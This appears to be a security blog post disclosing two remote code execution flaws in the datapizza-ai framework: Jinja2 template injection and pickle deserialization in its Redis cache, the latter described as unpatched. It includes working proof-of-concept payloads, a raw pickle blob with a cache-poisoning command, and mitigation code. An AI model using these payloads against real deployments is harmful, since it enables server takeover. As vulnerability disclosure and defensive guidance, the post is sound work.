datapizza-ai, Yet Another Vulnerable AI Framework
2026-02-25 05:07:40, Author: www.hacktivesecurity.com

TL;DR

Two Remote Code Execution (RCE) vulnerabilities were identified in the datapizza-ai framework:

  • SSTI leading to RCE (CVE-2026-2969, fixed): Unsafe usage of Jinja2’s Template() allows Server-Side Template Injection (SSTI). If an attacker can control prompt templates, they can execute arbitrary system commands on the host.
  • Unsafe Deserialization leading to RCE (CVE-2026-2970, still present): The Redis cache implementation uses pickle.loads() on untrusted data. By poisoning the cache, an attacker can trigger arbitrary command execution when cached objects are deserialized.

What is datapizza-ai

Source: https://github.com/datapizza-labs/datapizza-ai

CVE-2026-2969

The vulnerability is caused by compiling prompt template strings with Jinja2’s Template() constructor, which uses the default, unsandboxed environment (datapizza-ai-core/datapizza/modules/prompt/prompt.py, source here https://github.com/datapizza-labs/datapizza-ai/blob/v0.0.2/datapizza-ai-core/datapizza/modules/prompt/prompt.py).

from jinja2 import Template
# ...
class ChatPromptTemplate(Prompt):
    # ...
    def __init__(self, user_prompt_template, retrieval_prompt_template):
        self.user_prompt_template = Template(user_prompt_template)
        self.retrieval_prompt_template = Template(retrieval_prompt_template)
    # ...
        # Add user's prompt
        formatted_user_prompt = self.user_prompt_template.render(
            user_prompt=user_prompt
        )
        # ...
        formatted_retrieval = self.retrieval_prompt_template.render(chunks=chunks)
        # ...

To reproduce the exploit we have to install datapizza-ai:

python -m venv .venv
source .venv/bin/activate
pip install datapizza-ai==0.0.2

Create a Python file (poc.py) with the following content:

import uuid

from datapizza.modules.prompt import ChatPromptTemplate
from datapizza.type import Chunk

# Create structured prompts for different tasks
system_prompt = ChatPromptTemplate(
    user_prompt_template="You are helping with data analysis tasks, this is the user prompt: " \
    "{{self.__init__.__globals__.__builtins__.__import__('os').popen('touch pwned1')}}",
    retrieval_prompt_template="Retrieved " \
    "{{self.__init__.__globals__.__builtins__.__import__('os').popen('touch pwned2')}} " \
    "content:\n{% for chunk in chunks %}{{ chunk.text }}\n{% endfor %}"
)

print(
    system_prompt.format(
        user_prompt="Hello, how are you?", 
        chunks=[
            Chunk(id=str(uuid.uuid4()), text="This is a chunk"),
            Chunk(id=str(uuid.uuid4()), text="This is another chunk")
        ]
    )
)

Execute the file with python3 poc.py.

Command injection result (ls -alh):

total 28K
drwxrwxr-x  3 edoardottt edoardottt 4.0K Oct 14 12:31 .
drwxrwxr-x 13 edoardottt edoardottt 4.0K Oct 14 11:51 ..
-rw-rw-r--  1 edoardottt edoardottt  808 Oct 14 12:31 poc3-working.py
-rw-rw-r--  1 edoardottt edoardottt    0 Oct 14 12:30 pwned1
-rw-rw-r--  1 edoardottt edoardottt    0 Oct 14 12:30 pwned2
drwxrwxr-x  5 edoardottt edoardottt 4.0K Oct 14 11:53 .venv
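
The payload works because the default Jinja2 environment lets a template read attributes of any object it can reach, including the object exposed as self. The sketch below repeats the same attribute walk in plain Python, with no Jinja2 involved. TemplateStandIn and reach_import are hypothetical names used only for illustration, and a harmless os.getpid() call stands in for popen().

```python
import types


class TemplateStandIn:
    """Hypothetical stand-in for the object a Jinja2 template sees as `self`."""

    def __init__(self):
        pass


def reach_import(obj):
    """Walk obj.__init__.__globals__.__builtins__.__import__ like the payload."""
    module_globals = obj.__init__.__globals__  # globals of the defining module
    builtins_ref = module_globals["__builtins__"]
    # __builtins__ is a module in __main__ and a plain dict in imported modules.
    if isinstance(builtins_ref, types.ModuleType):
        return builtins_ref.__import__
    return builtins_ref["__import__"]


importer = reach_import(TemplateStandIn())
os_module = importer("os")
# Harmless call in place of popen(): shows that arbitrary modules are reachable.
print(os_module.getpid())
```

Jinja2 falls back to item access when attribute access fails, which is why the dotted form in the payload also works when __builtins__ is a dict.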

An attacker who controls prompt templates can usually subvert the model’s behavior.
In this case, they can also run arbitrary system commands without any restriction (e.g. spawn a reverse shell and gain access to the server).
The impact is critical, as the attacker can completely take over the server host.
The Proof of Concept above is deliberately simple, but in reality every feature that passes untrusted input to ChatPromptTemplate as a template is vulnerable.
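
One way to avoid this class of bug is to keep template strings developer-authored and pass untrusted text only as render variables. Where Jinja2 really has to compile strings from outside, jinja2.sandbox.SandboxedEnvironment is the library's own restricted option. The sketch below illustrates the first idea with the standard library's string.Template instead of Jinja2. It is not the vendor's fix, and render_prompt and USER_PROMPT_TEMPLATE are hypothetical names.

```python
from string import Template

# Developer-authored template: never built from user input.
USER_PROMPT_TEMPLATE = Template(
    "You are helping with data analysis tasks, this is the user prompt: $user_prompt"
)


def render_prompt(user_prompt: str) -> str:
    """Substitute untrusted text as data; string.Template evaluates no expressions."""
    return USER_PROMPT_TEMPLATE.substitute(user_prompt=user_prompt)


payload = "{{self.__init__.__globals__.__builtins__.__import__('os').popen('id')}}"
rendered = render_prompt(payload)
# The payload comes out verbatim as inert text.
print(rendered)
```

The substituted value is never parsed as a template, so the braces have no special meaning. The trade-off is that string.Template has no loops or filters, so anything like the chunk list would have to be joined into a string before substitution.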

CVE-2026-2970

The vulnerability is caused by calling pickle.loads() on values read back from Redis, which may be attacker-controlled (datapizza-ai-cache/redis/datapizza/cache/redis/cache.py, source here https://github.com/datapizza-labs/datapizza-ai/blob/v0.0.7/datapizza-ai-cache/redis/datapizza/cache/redis/cache.py).

import pickle
# ...
class RedisCache(Cache):
# ...
    def get(self, key: str) -> str | None:
        """Retrieve and deserialize object"""
        pickled_obj = self.redis.get(key)
        if pickled_obj is None:
            return None
        return pickle.loads(pickled_obj)  # type: ignore

    def set(self, key: str, obj):
        """Serialize and store object"""
        pickled_obj = pickle.dumps(obj)
        self.redis.set(key, pickled_obj, ex=self.expiration_time)
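
Why pickle.loads() on untrusted bytes amounts to code execution can be shown with a harmless example. In this minimal sketch the class Harmless is a hypothetical name, and os.getpid takes the place of a dangerous callable such as os.system.

```python
import os
import pickle


class Harmless:
    """Same shape as an attack payload, but the callable is os.getpid."""

    def __reduce__(self):
        # pickle stores "call os.getpid()" instead of the object's state.
        return (os.getpid, ())


blob = pickle.dumps(Harmless())
# Loading does not rebuild a Harmless instance: it calls os.getpid().
result = pickle.loads(blob)
print(type(result).__name__, result == os.getpid())
```

The loading side never needs the Harmless class to exist. The byte stream only names a callable and its arguments, and pickle.loads() invokes it.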

To reproduce the exploit we have to install datapizza-ai and the Redis cache module:

python -m venv .venv
source .venv/bin/activate
pip install datapizza-ai==0.0.7
pip install datapizza-ai-cache-redis

Spin up a Redis server (we’re using Docker for simplicity):

docker run -d --name redis -p 6379:6379 redis:latest

For a simple proof of concept we’re using the bytes representation of the pickled object below:

import os

class Evil:
    def __reduce__(self):
        # pickle.loads() will call os.system("touch cachepwned")
        return (os.system, ("touch cachepwned",))

that is: \x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94..
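
The payload bytes can be inspected without executing them. The sketch below uses the standard library's pickletools.genops, which only parses the opcode stream, to list what pickle.loads() would do with it. The variable names are illustrative.

```python
import pickletools

# Payload bytes exactly as listed above; they are only parsed here, never loaded.
payload = (
    b"\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94"
    b"\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94."
)

opcodes = [(op.name, arg) for op, arg, _pos in pickletools.genops(payload)]
names = [name for name, _ in opcodes]
strings = [arg for name, arg in opcodes if name == "SHORT_BINUNICODE"]

print(names)
print(strings)
```

STACK_GLOBAL resolves posix.system (the name under which os.system is recorded on Linux), and REDUCE calls it with the argument tuple that holds the shell command.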

Poison the Redis cache with this value:

127.0.0.1:6379> set poc "\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94."
OK

Then run the Python program below with python3 poc.py.
The snippet just creates a new RedisCache object and tries to read the value of the key “poc” from Redis.

from datapizza.cache.redis import RedisCache

def test_redis_cache():
    cache = RedisCache(host="localhost", port=6379, db=0)
    cache.get("poc")

test_redis_cache()

Command injection result (ls -alh):

total 16K
-rw-rw-r-- 1 edoardottt edoardottt    0 Oct 15 18:57 cachepwned
-rw-rw-r-- 1 edoardottt edoardottt  312 Oct 15 18:51 poc-cache.py
drwxrwxr-x 5 edoardottt edoardottt 4.0K Oct 14 11:53 .venv/

An attacker who controls the Redis cache can usually subvert the model’s behavior, for example by injecting fake LLM replies into cached queries.
In this case, they can also run arbitrary system commands without any restriction (e.g. spawn a reverse shell and gain access to the server).
The impact is high, as the attacker can completely take over the server host.
The Proof of Concept above is deliberately simple, but in reality every feature that uses RedisCache is potentially vulnerable.
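
A common way to remove the code execution risk is to store cache values in a data-only format such as JSON instead of pickle. The sketch below is an illustration under stated assumptions, not the vendor's code or a drop-in patch. JsonCache is a hypothetical class, and a plain dict stands in for the Redis client.

```python
import json


class JsonCache:
    """Hypothetical cache wrapper; a dict stands in for the Redis client."""

    def __init__(self):
        self._store = {}  # stand-in for redis.get / redis.set

    def set(self, key: str, obj) -> None:
        # Only JSON-compatible values (str, numbers, lists, dicts) are accepted.
        self._store[key] = json.dumps(obj).encode("utf-8")

    def get(self, key: str):
        raw = self._store.get(key)
        if raw is None:
            return None
        try:
            # Parsing JSON builds plain data and never calls arbitrary callables.
            return json.loads(raw)
        except ValueError:
            return None  # treat malformed or poisoned entries as a cache miss


cache = JsonCache()
cache.set("answer", {"text": "cached LLM reply"})
# Simulate poisoning with the pickle payload from the proof of concept.
cache._store["poc"] = (
    b"\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94"
    b"\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94."
)
print(cache.get("answer"))
print(cache.get("poc"))
```

This only removes the command execution path. An attacker with write access to the cache can still inject fake replies as valid JSON, so access to Redis itself still has to be restricted.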

Final Considerations

I want to share a couple of thoughts:

First: how is it possible that in 2026 we still have these types of vulnerabilities?
Nowadays, any developer should know that every language has libraries, such as Jinja2 and pickle, that lead to severe vulnerabilities when misused.

Second: It was a pain in the ass communicating with the vendor.
Emails (from me and a CNA), Discord messages and GitHub private security advisories were all used, and still this has been the process so far:

That’s it, no further communication. We didn’t receive replies to our messages and no public advisory or user notification was issued in accordance with responsible disclosure practices.

The Unsafe Deserialization is still present, with no response from the vendor (https://github.com/datapizza-labs/datapizza-ai/blob/f3c5508acce857f6a454ca239aea7481f97ceb69/datapizza-ai-cache/redis/datapizza/cache/redis/cache.py).

How is it possible that in 2026 companies still fail to understand how basic security practices work and don’t care about the security of their product (and users)?

At first I wanted to use a lot of memes here (Datapizza uses a lot), but honestly there’s nothing to laugh about 😕.

Article source: https://www.hacktivesecurity.com/blog/2026/02/25/datapizza-ai-yet-another-vulnerable-ai-framework/